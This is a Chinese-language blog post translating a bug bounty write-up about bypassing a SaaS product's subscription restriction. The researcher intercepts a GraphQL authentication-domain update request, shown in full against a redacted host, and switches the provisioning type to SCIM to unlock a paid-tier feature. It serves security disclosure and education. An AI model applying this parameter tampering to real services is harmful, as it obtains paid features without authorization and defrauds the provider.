白帽故事 · 2024年8月21日 0

IDOR之如何打破订阅限制

前言

众所周知,很多订阅产品的管理页面中包含许多功能,如使用情况、数据、用户、访问等管理。

今天分享一个国外利用业务逻辑缺陷打破订阅时限限制的案例,废话不多说,让我们开始吧。

漏洞详情

白帽小哥偶然间发现了一个带有Authentication Domains用户管理的界面,正如下面所看到的,该界面用于创建身份验证域或重命名默认名称或更改内容:

file

于此同时白帽小哥还发现使用此界面可以订阅专业计划:

file

经过一番测试,白帽小哥最终发现绕过方法。

首先进入用户管理:

file

接着点击用户设置按钮:

file

然后更改此处的值并拦截请求:

file

通过该请求,可以发现使用了 graphql :

POST /graphql HTTP/2
Host: redacted.com
Cookie: xxxxxxxxxxxxx
Content-Length: 2723
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: /
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: <https://redacted.com>
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: <https://redacted.com/>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"operationName":"AuthenticationDomainUpdateMutation","variables":{"includeScimConfiguration":false,"includeSamlConfiguration":false,"id":"d937a430-7593-4b86-b073-a14dcd20a229","name":"momen0x00","authenticationType":"PASSWORD","provisioningType":"MANUAL","basicFullTierChangeApproval":"ADMIN_REVIEW","coreFullTierChangeApproval":"ADMIN_REVIEW","basicCoreTierChangeApproval":"ADMIN_REVIEW","idpManagedAttributes":[],"upgradeMessage":null,"upgradeButtonText":null,"upgradeButtonTargetUrl":null,"maxBrowserSessionDuration":2592000,"maxBrowserIdleDuration":604800},"query":"mutation AuthenticationDomainUpdateMutation($id: ID!, $name: String, $currentSamlConfigurationId: String, $currentScimConfigurationId: String, $authenticationType: String, $provisioningType: String, $maxBrowserSessionDuration: Int, $maxBrowserIdleDuration: Int, $basicCoreTierChangeApproval: String, $basicFullTierChangeApproval: String, $coreFullTierChangeApproval: String, $includeScimConfiguration: Boolean = false, $includeSamlConfiguration: Boolean = false, $postUpdateActions: [PostUpdateActions], $idpManagedAttributes: [IdpManagedAttributes], $upgradeMessage: String, $upgradeButtonText: String, $upgradeButtonTargetUrl: String) {\\n updateAuthenticationDomain(\\n input: {id: $id, name: $name, currentSamlConfigurationId: $currentSamlConfigurationId, currentScimConfigurationId: $currentScimConfigurationId, authenticationType: $authenticationType, provisioningType: $provisioningType, maxBrowserSessionDuration: $maxBrowserSessionDuration, maxBrowserIdleDuration: $maxBrowserIdleDuration, basicCoreTierChangeApproval: $basicCoreTierChangeApproval, basicFullTierChangeApproval: $basicFullTierChangeApproval, coreFullTierChangeApproval: $coreFullTierChangeApproval, postUpdateActions: $postUpdateActions, idpManagedAttributes: $idpManagedAttributes, upgradeMessage: $upgradeMessage, upgradeButtonText: $upgradeButtonText, upgradeButtonTargetUrl: $upgradeButtonTargetUrl}\\n ) {\\n id\\n name\\n authenticationType\\n provisioningType\\n maxBrowserSessionDuration\\n maxBrowserIdleDuration\\n basicCoreTierChangeApproval\\n basicFullTierChangeApproval\\n coreFullTierChangeApproval\\n idpManagedAttributes\\n upgradeMessage\\n upgradeButtonText\\n upgradeButtonTargetUrl\\n currentSamlConfiguration @include(if: $includeSamlConfiguration) {\\n idpSsoTargetUrl\\n logoutRedirectUrl\\n certificate\\n certificateFilename\\n assertionConsumerUrl\\n spEntityId\\n idpEntityId\\n idpMetadata\\n __typename\\n }\\n currentScimConfiguration @include(if: $includeScimConfiguration) {\\n authenticationDomainId\\n createdAt\\n __typename\\n }\\n __typename\\n }\\n}\\n"}

通过修改以下参数:

"name":"DEFAULT" 修改为 "name":"BUG"
"provisioningType":"Manual", 修改为 "provisioningType":"SCIM"

而后发送请求后至 Auth Domain 界面:

file

可以看到,成功绕过订阅限制。

以上内容由骨哥进行翻译并整理,希望对你有所收获。

原文:https://0xmatrix.medium.com/hacking-the-system-how-i-beat-subscription-restrictions-in-admin-controls-5684fd90279a